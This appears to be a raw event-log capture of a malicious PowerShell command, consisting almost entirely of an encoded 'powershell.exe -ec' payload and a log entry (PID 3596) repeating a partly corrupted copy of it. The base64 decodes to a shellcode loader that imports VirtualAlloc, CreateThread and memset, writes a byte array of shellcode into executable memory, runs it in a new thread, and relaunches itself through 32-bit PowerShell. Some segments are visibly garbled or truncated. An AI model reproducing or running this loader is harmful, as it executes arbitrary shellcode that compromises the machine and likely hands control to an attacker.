YwBkACwAMAB4ADAAOQAsADAAeABmADAALAAwAHgAMwA1ACwAMAB4AGMAOQAsADAAeAA1ADIALAAwAHgAYQAyACwAMAB4ADUANAAsADAAeAA0ADgALAAwAHgAMwBlACwAMAB4ADAANQAsADAAeAA2ADgALAAwAHgAOABhACwAMAB4AGUAMQAsADAAeABmAGEALAAwAHgAYwBjACwAMAB4AGMAMAAsADAAeAAwAGYALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAA4AGIALAAwAHgANAA3ACwAMAB4AGMAMwAsADAAeAA0AGMALAAwAHgAMwA0ACwAMAB4ADkANwAsADAAeAA0AGIALAAwAHgAYwA2ACwAMAB4ADQANwAsADAAeABhADUALAAwAHgAZAA0ACwAMAB4ADcAYwAsADAAeABjADAALAAwAHgAOAA1ACwAMAB4ADkAZAAsADAAeAA1AGEALAAwAHgAMQA3ACwAMAB4AGUAYQAsADAAeABiADcALAAwAHgAMQBiACwAMAB4ADgANwAsADAAeAAxADUALAAwAHgAMwA4ACwAMAB4ADUAYwAsADAAeAA4ADEALAAwAHgAZAAxACwAMAB4ADYAYwAsADAAeAAwAGMALAAwAHgAYgA5ACwAMAB4AGYAMAAsADAAeAAwAGMALAAwAHgAYwA3ACwAMAB4ADMAOQAsADAAeABmAGQALAAwAHgAZAA4ACwAMAB4ADcAMgAsADAAeAAzADAALAAwAHgANgA5ACwAMAB4AGIAOAAsADAAeAAyADIALAAwAHgAZABiACwAMAB4ADUAOAAsADAAeAA1ADYALAAwAHgAMgAxACwAMAB4AGUANAAsADAAeAA4AGIALAAwAHgAZgBhACwAMAB4AGEAYwAsADAAeAAwADIALAAwAHgAZgBiACwAMAB4ADUAMgAsADAAeABmAGYALAAwAHgAOQBhACwAMAB4AGIAYgAsADAAeAAwADIALAAwAHgAYgBmACwAMAB4ADQAYQAsADAAeAA1ADMALAAwAHgANAA5ACwAMAB4ADMAMAAsADAAeABiADQALAAwAHgANAAzACwAMAB4ADcAMgAsADAAeAA5AGEALAAwAHgAZABkACwAMAB4AGUAOQAsADAAeAA5AGQALAAwAHgANwAzACwAMAB4AGIANQAsADAAeAA4ADUALAAwAHgAMAA0ACwAMAB4AGQAZQAsADAAeAA0AGQALAAwAHgAMwA0ACwAMAB4AGMAOAAsADAAeABmADQALAAwAHgAMgBiACwAMAB4ADcANgAsADAAeAA0ADIALAAwAHgAZgBiACwAMAB4AGMAYwAsADAAeAAzADgALAAwAHgAYQAzACwAMAB4ADcANgAsADAAeABkAGYALAAwAHgAYQBjACwAMAB4ADQAMwAsADAAeABjAGQALAAwAHgAYgBkACwAMAB4ADcAYQAsADAAeAA1AGIALAAwAHgAZgBiACwAMAB4AGEAOAAsADAAeAA4ADIALAAwAHgAYwA5ACwAMAB4ADAAMAAsADAAeAA3AGIALAAwAHgAZAA1ACwAMAB4ADYANQAsADAAeAAwAGIALAAwAHgANQBhACwAMAB4ADEAMQAsADAAeAAyAGEALAAwAHgAZgA0ACwAMAB4ADgAOQAsADAAeAAyAGEALAAwAHgAZQAzACwAMAB4ADYAMAAsADAAeAA3ADIALAAwAHgANAA0ACwAMAB4ADAAYwAsADAAeAA2ADUALAAwAHgANwAyACwAMAB4ADkANAAsADAAeAA1AGEALAAwAHgAZQBmACwAMAB4ADcAMgAsADAAeABmAGMALAAwAHgAMwBhACwAMAB4ADQAYgAsADAAeAAyADEALAAwAHgAMQA5ACwAMAB4ADQANQAsADAAeAA0ADYALAAwAHgANQA1ACwAMAB4AGIAMgAsADAAeABkADAALAAwAHgANgA5ACwAMAB4ADAAYwAsADAAeAA2ADcALAAwAHgANwAyACwAMAB4ADAAMgAsADAAeABiADIALAAwAHgANQBlACwAMAB4AGIANAAsADAAeAA4AGQALAAwAHgANABkACwAMAB4AGIANQAsADAAeAA0ADQALAAwAHgAZgAxACwAMAB4ADkAYgAsADAAeABmADMALAAwAHgAMwAyACwAMAB4ADEAYgAsADAAeAAxADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHEAcgBJAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAHIASQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQByAEkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABtAHYAZQApACkAOwAkAFAAcgBZAGgAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQARABJAEkATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABEAEkASQBNACAAJABQAHIAWQBoACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFAAcgBZAGgAIAAkAGUAIgA7AH0A'"
(PID: 3596, Additional Context: sv IY -sv FI ecsv CSH ((gv IY).value.toString()+(gv FI).value.toString()) (gv CSH).value.toString()'JABtAHYAZQAgAD0AIAAnACQASwBDAGsAcwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcABAGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcABAGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcABAGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIABAGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABLAEMAawBzACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgBAG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABkAGEALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4AGIAYQAsADAAeAA4AGEALAAwAHgAZgBjACwAMAB4ADUAOQAsADAAeABiADMALAAwAHgANQA4ACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANQAwACwAMAB4ADEANAAsADAAeAAwADMALAAwAHgANQAwACwAMAB4ADkAZQAsADAAeAAxAGUALAAwAHgAYQBjACwAMAB4ADQAZgAsADAAeAA3ADYALAAwAHgANQBjACwAMAB4ADQAZgAsADAAeABiADAALAAwAHgAOAA2ACwAMAB4ADAAMQAsADAAeABkADkALAAwAHgANQAACwAMAB4AGIANwAsADAAeAAwADEALAAwAHgAYgBkACwAMAB4ADEAZQAsADAAeABlADcALAAwAHgAYgAxACwAMAB4AGIANQAsADAAeAA3ADMALAAwAHgAMABiACwAMAB4ADMAOQAsADAAeAA5AGIALAAwAHgANgA3ACwAMAB4ADkAOAAsADAAeAA0AGYALAAwAHgAMwA0ACwAMAB4ADgANwAsADAAeAAyADkALAAwAHgAZQAACwAMAB4ADYAMgAsADAAeABhADYALAAwAHgAYQBhACwAMAB4ADUANgAsADAAeAAADYALAAwAHgAYQA5ACwAMAB4ADIAOAAsADAAeABhADUALAAwAHgAOABiACwAMAB4ADAAOQAsADAAeAAxADEALAAwAHgANgA2ACwAMAB4AGQAZQAsADAAeAA0ADgALAAwAHgANQA2ACwAMAB4ADkAYgAsADAAeAAxADMALAAwAHgAMQA4ACwAMAB4ADAAZgAsADAAeABkADcALAAwAHgAOAA2ACwAMAB4ADgAZAAsADAAeAAyADQALAAwAHgAYQBkACwAMAB4ADEAYQAsADAAeAAyADUALAAwAHgANwA2ACwAMAB4ADIAMwAsADAAeAAxAGIALAAwAHgAZABhACwAMAB4AGMAZQAsADAAeAA0ADIALAAwAHgAMABhACwAMAB4ADQAZAAsADAAeAA0ADUALAAwAHgAMQBkACwAMAB4ADgAYwAsADAAeAA2AGYALAAwAHgAOABhACwAMAB4ADEANQAsADAAeAA4ADUALAAwAHgANwA3ACwAMAB4AGMAZgAsADAAeAAxADAALAAwAHgANQBmACwAMAB4ADAAMwAsADAAeAAzAGIALAAwAHgAZQBlACwAMAB4ADUAZQAsADAAeABjADUALAAwAHgANwAyACwAMAB4ADAAZgAsADAAeABjAGMALAAwAHgAMgA4ACwAMAB4AGIAYgAsADAAeABlADIALAAwAHgAMABjACwAMAB4ADYAYwAsADAAeAA3AGIALAAwAHgAMQBkACwAMAB4ADcAYgAsADAAeAA4ADQALAAwAHgANwA4ACwAMAB4AGEAMAAsADAAeAA3AGMALAAwAHgANQAzACwAMAB4ADAAMwAsADAAeAA3AGUALAAwAHgAMAA4ACwAMAB4ADQAMAAsADAAeABhADMALAAwAHgAZgAACwAMAB4AGEAYQAsADAAeABhAGMALAAwAHgANQAyACwAMAB4AGQAOQAsADAAeAAyAGQALAAwAHgAMgA2ACwAMAB4ADUAOAAsADAAeAA5ADYALAAwAHgAMwBhACwAMAB4ADYAMAAsADAAeAA3AGMALAAwAHgAMgA5ACwAMAB4AGUAZQAsADAAeAAxAGEALAAwAHgANwA4ACwAMAB4AGEAMgAsADAAeAAxADEALAAwAHgAYwBkACwAMAB4ADAAOQAsADAAeABmADAALAAwAHgAMwAACwAMAB4AGMAOQAsADAAeAAADIALAAwAHgAYQAyACwAMAB4ADUANAAsADAAeAA0ADgALAAwAHgAMwBlACwAMAB4ADAANQAsADAAeAA2ADgALAAwAHgAOABhACwAMAB4AGUAMQAsADAAeABmAGEALAAwAHgAYwBjACwAMAB4AGMAMAAsADAAeAAwAGYALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAA4AGIALAAwAHgANAA3ACwAMAB4AGMAMwAsADAAeAA0AGMALAAwAHgAMwA0ACwAMAB4ADkANwAsADAAeAA0AGIALAAwAHgAYwA2ACwAMAB4ADQANwAsADAAeABhADUALAAwAHgAZAA0ACwAMAB4ADcAYwAsADAAeABjADAALAAwAHgAOAAACwAMAB4ADkAZAAsADAAeAAAGEALAAwAHgAMQA3ACwAMAB4AGUAYQAsADAAeABiADcALAAwAHgAMQBiACwAMAB4ADgANwAsADAAeAAxADUALAAwAHgAMwA4ACwAMAB4ADUAYwAsADAAeAA4ADEALAAwAHgAZAAxACwAMAB4ADYAYwAsADAAeAAwAGMALAAwAHgAYgA5ACwAMAB4AGYAMAAsADAAeAAwAGMALAAwAHgAYwA3ACwAMAB4ADMAOQAsADAAeABmAGQALAAwAHgAZAA4ACwAMAB4ADcAMgAsADAAeAAzADAALAAwAHgANgA5ACwAMAB4AGIAOAAsADAAeAAyADIALAAwAHgAZABiACwAMAB4ADUAOAAsADAAeAAADYALAAwAHgAMgAxACwAMAB4AGUANAAsADAAeAA4AGIALAAwAHgAZgBhACwAMAB4AGEAYwAsADAAeAAwADIALAAwAHgAZgBiACwAMAB4ADUAMgAsADAAeABmAGYALAAwAHgAOQBhACwAMAB4AGIAYgAsADAAeAAwADIALAAwAHgAYgBmACwAMAB4ADQAYQAsADAAeAAADMALAAwAHgANAA5ACwAMAB4ADMAMAAsADAAeABiADQALAAwAHgANAAzACwAMAB4ADcAMgAsADAAeAA5AGEALAAwAHgAZABkACwAMAB4AGUAOQAsADAAeAA5AGQALAAwAHgANwAzACwAMAB4AGIANQAsADAAeAA4ADUALAAwAHgAMAA0ACwAMAB4AGQAZQAsADAAeAA0AGQALAAwAHgAMwA0ACwAMAB4AGMAOAAsADAAeABmADQALAAwAHgAMgBiACwAMAB4ADcANgAsADAAeAA0ADIALAAwAHgAZgBiACwAMAB4AGMAYwAsADAAeAAzADgALAAwAHgAYQAzACwAMAB4ADcANgAsADAAeABkAGYALAAwAHgAYQBjACwAMAB4ADQAMwAsADAAeABjAGQALAAwAHgAYgBkACwAMAB4ADcAYQAsADAAeAAAGIALAAwAHgAZgBiACwAMAB4AGEAOAAsADAAeAA4ADIALAAwAHgAYwA5ACwAMAB4ADAAMAAsADAAeAA3AGIALAAwAHgAZAAACwAMAB4ADYANQAsADAAeAAwAGIALAAwAHgANQBhACwAMAB4ADEAMQAsADAAeAAyAGEALAAwAHgAZgA0ACwAMAB4ADgAOQAsADAAeAAyAGEALAAwAHgAZQAzACwAMAB4ADYAMAAsADAAeAA3ADIALAAwAHgANAA0ACwAMAB4ADAAYwAsADAAeAA2ADUALAAwAHgANwAyACwAMAB4ADkANAAsADAAeAAAGEALAAwAHgAZQBmACwAMAB4ADcAMgAsADAAeABmAGMALAAwAHgAMwBhACwAMAB4ADQAYgAsADAAeAAyADEALAAwAHgAMQA5ACwAMAB4ADQANQAsADAAeAA0ADYALAAwAHgANQAACwAMAB4AGIAMgAsADAAeABkADAALAAwAHgANgA5ACwAMAB4ADAAYwAsADAAeAA2ADcALAAwAHgANwAyACwAMAB4ADAAMgAsADAAeABiADIALAAwAHgANQBlACwAMAB4AGIANAAsADAAeAA4AGQALAAwAHgANABkACwAMAB4AGIANQAsADAAeAA0ADQALAAwAHgAZgAxACwAMAB4ADkAYgAsADAAeABmADMALAAwAHgAMwAyACwAMAB4ADEAYgAsADAAeAAxADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHEAcgBJAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAHIASQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQByAEkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABtAHYAZQApACkAOwAkAFAAcgBZAGgAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQARABJAEkATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABEAEkASQBNACAAJABQAHIAWQBoACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFAAcgBZAGgAIAAkAGUAIgA7AH0A';)
-
powershell.exe
-ec JABtAHYAZQAgAD0AIAAnACQASwBDAGsAcwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABLAEMAawBzACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABkAGEALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4AGIAYQAsADAAeAA4AGEALAAwAHgAZgBjACwAMAB4ADUAOQAsADAAeABiADMALAAwAHgANQA4ACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANQAwACwAMAB4ADEANAAsADAAeAAwADMALAAwAHgANQAwACwAMAB4ADkAZQAsADAAeAAxAGUALAAwAHgAYQBjACwAMAB4ADQAZgAsADAAeAA3ADYALAAwAHgANQBjACwAMAB4ADQAZgAsADAAeABiADAALAAwAHgAOAA2ACwAMAB4ADAAMQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4AGIANwAsADAAeAAwADEALAAwAHgAYgBkACwAMAB4ADEAZQAsADAAeABlADcALAAwAHgAYgAxACwAMAB4AGIANQAsADAAeAA3ADMALAAwAHgAMABiACwAMAB4ADMAOQAsADAAeAA5AGIALAAwAHgANgA3ACwAMAB4ADkAOAAsADAAeAA0AGYALAAwAHgAMwA0ACwAMAB4ADgANwAsADAAeAAyADkALAAwAHgAZQA1ACwAMAB4ADYAMgAsADAAeABhADYALAAwAHgAYQBhACwAMAB4ADUANgAsADAAeAA1ADYALAAwAHgAYQA5ACwAMAB4ADIAOAAsADAAeABhADUALAAwAHgAOABiACwAMAB4ADAAOQAsADAAeAAxADEALAAwAHgANgA2ACwAMAB4AGQAZQAsADAAeAA0ADgALAAwAHgANQA2ACwAMAB4ADkAYgAsADAAeAAxADMALAAwAHgAMQA4ACwAMAB4ADAAZgAsADAAeABkADcALAAwAHgAOAA2ACwAMAB4ADgAZAAsADAAeAAyADQALAAwAHgAYQBkACwAMAB4ADEAYQAsADAAeAAyADUALAAwAHgANwA2ACwAMAB4ADIAMwAsADAAeAAxAGIALAAwAHgAZABhACwAMAB4AGMAZQAsADAAeAA0ADIALAAwAHgAMABhACwAMAB4ADQAZAAsADAAeAA0ADUALAAwAHgAMQBkACwAMAB4ADgAYwAsADAAeAA2AGYALAAwAHgAOABhACwAMAB4ADEANQAsADAAeAA4ADUALAAwAHgANwA3ACwAMAB4AGMAZgAsADAAeAAxADAALAAwAHgANQBmACwAMAB4ADAAMwAsADAAeAAzAGIALAAwAHgAZQBlACwAMAB4ADUAZQAsADAAeABjADUALAAwAHgANwAyACwAMAB4ADAAZgAsADAAeABjAGMALAAwAHgAMgA4ACwAMAB4AGIAYgAsADAAeABlADIALAAwAHgAMABjACwAMAB4ADYAYwAsADAAeAA3AGIALAAwAHgAMQBkACwAMAB4ADcAYgAsADAAeAA4ADQALAAwAHgANwA4ACwAMAB4AGEAMAAsADAAeAA3AGMALAAwAHgANQAzACwAMAB4ADAAMwAsADAAeAA3AGUALAAwAHgAMAA4ACwAMAB4ADQAMAAsADAAeABhADMALAAwAHgAZgA1ACwAMAB4AGEAYQAsADAAeABhAGMALAAwAHgANQAyACwAMAB4AGQAOQAsADAAeAAyAGQALAAwAHgAMgA2ACwAMAB4ADUAOAAsADAAeAA5ADYALAAwAHgAMwBhACwAMAB4ADYAMAAsADAAeAA3AGMALAAwAHgAMgA5ACwAMAB4AGUAZQAsADAAeAAxAGEALAAwAHgANwA4ACwAMAB4AGEAMgAsADAAeAAxADEALAAwAHgAYwBkACwAMAB4ADAAOQAsADAAeABmADAALAAwAHgAMwA1ACwAMAB4AGMAOQAsADAAeAA1ADIALAAwAHgAYQAyACwAMAB4ADUANAAsADAAeAA0ADgALAAwAHgAMwBlACwAMAB4ADAANQAsADAAeAA2ADgALAAwAHgAOABhACwAMAB4AGUAMQAsADAAeABmAGEALAAwAHgAYwBjACwAMAB4AGMAMAAsADAAeAAwAGYALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAA4AGIALAAwAHgANAA3ACwAMAB4AGMAMwAsADAAeAA0AGMALAAwAHgAMwA0ACwAMAB4ADkANwAsADAAeAA0AGIALAAwAHgAYwA2ACwAMAB4ADQANwAsADAAeABhADUALAAwAHgAZAA0ACwAMAB4ADcAYwAsADAAeABjADAALAAwAHgAOAA1ACwAMAB4ADkAZAAsADAAeAA1AGEALAAwAHgAMQA3ACwAMAB4AGUAYQAsADAAeABiADcALAAwAHgAMQBiACwAMAB4ADgANwAsADAAeAAxADUALAAwAHgAMwA4ACwAMAB4ADUAYwAsADAAeAA4ADEALAAwAHgAZAAxACwAMAB4ADYAYwAsADAAeAAwAGMALAAwAHgAYgA5ACwAMAB4AGYAMAAsADAAeAAwAGMALAAwAHgAYwA3ACwAMAB4ADMAOQAsADAAeABmAGQALAAwAHgAZAA4ACwAMAB4ADcAMgAsADAAeAAzADAALAAwAHgANgA5ACwAMAB4AGIAOAAsADAAeAAyADIALAAwAHgAZABiACwAMAB4ADUAOAAsADAAeAA1ADYALAAwAHgAMgAxACwAMAB4AGUANAAsADAAeAA4AGIALAAwAHgAZgBhACwAMAB4AGEAYwAsADAAeAAwADIALAAwAHgAZgBiACwAMAB4ADUAMgAsADAAeABmAGYALAAwAHgAOQBhACwAMAB4AGIAYgAsADAAeAAwADIALAAwAHgAYgBmACwAMAB4ADQAYQAsADAAeAA1ADMALAAwAHgANAA5ACwAMAB4ADMAMAAsADAAeABiADQALAAwAHgANAAzACwAMAB4ADcAMgAsADAAeAA5AGEALAAwAHgAZABkACwAMAB4AGUAOQAsADAAeAA5AGQALAAwAHgANwAzACwAMAB4AGIANQAsADAAeAA4ADUALAAwAHgAMAA0ACwAMAB4AGQAZQAsADAAeAA0AGQALAAwAHgAMwA0ACwAMAB4AGMAOAAsADAAeABmADQALAAwAHgAMgBiACwAMAB4ADcANgAsADAAeAA0ADIALAAwAHgAZgBiACwAMAB4AGMAYwAsADAAeAAzADgALAAwAHgAYQAzACwAMAB4ADcANgAsADAAeABkAGYALAAwAHgAYQBjACwAMAB4ADQAMwAsADAAeABjAGQALAAwAHgAYgBkACwAMAB4ADcAYQAsADAAeAA1AGIALAAwAHgAZgBiACwAMAB4AGEAOAAsADAAeAA4ADIALAAwAHgAYwA5ACwAMAB4ADAAMAAsADAAeAA3AGIALAAwAHgAZAA1ACwAMAB4ADYANQAsADAAeAAwAGIALAAwAHgANQBhACwAMAB4ADEAMQAsADAAeAAyAGEALAAwAHgAZgA0ACwAMAB4ADgAOQAsADAAeAAyAGEALAAwAHgAZQAzACwAMAB4ADYAMAAsADAAeAA3ADIALAAwAHgANAA0ACwAMAB4ADAAYwAsADAAeAA2ADUALAAwAHgANwAyACwAMAB4ADkANAAsADAAeAA1AGEALAAwAHgAZQBmACwAMAB4ADcAMgAsADAAeABmAGMALAAwAHgAMwBhACwAMAB4ADQAYgAsADAAeAAyADEALAAwAHgAMQA5ACwAMAB4ADQANQAsADAAeAA0ADYALAAwAHgANQA1ACwAMAB4AGIAMgAsADAAeABkADAALAAwAHgANgA5ACwAMAB4ADAAYwAsADAAeAA2ADcALAAwAHgANwAyACwAMAB4ADAAMgAsADAAeABiADIALAAwAHgANQBlACwAMAB4AGIANAAsADAAeAA4AGQALAAwAHgANABkACwAMAB4AGIANQAsADAAeAA0ADQALAAwAHgAZgAxACwAMAB4ADkAYgAsADAAeABmADMALAAwAHgAMwAyACwAMAB4ADEAYgAsADAAeAAxADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHEAcgBJAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAAL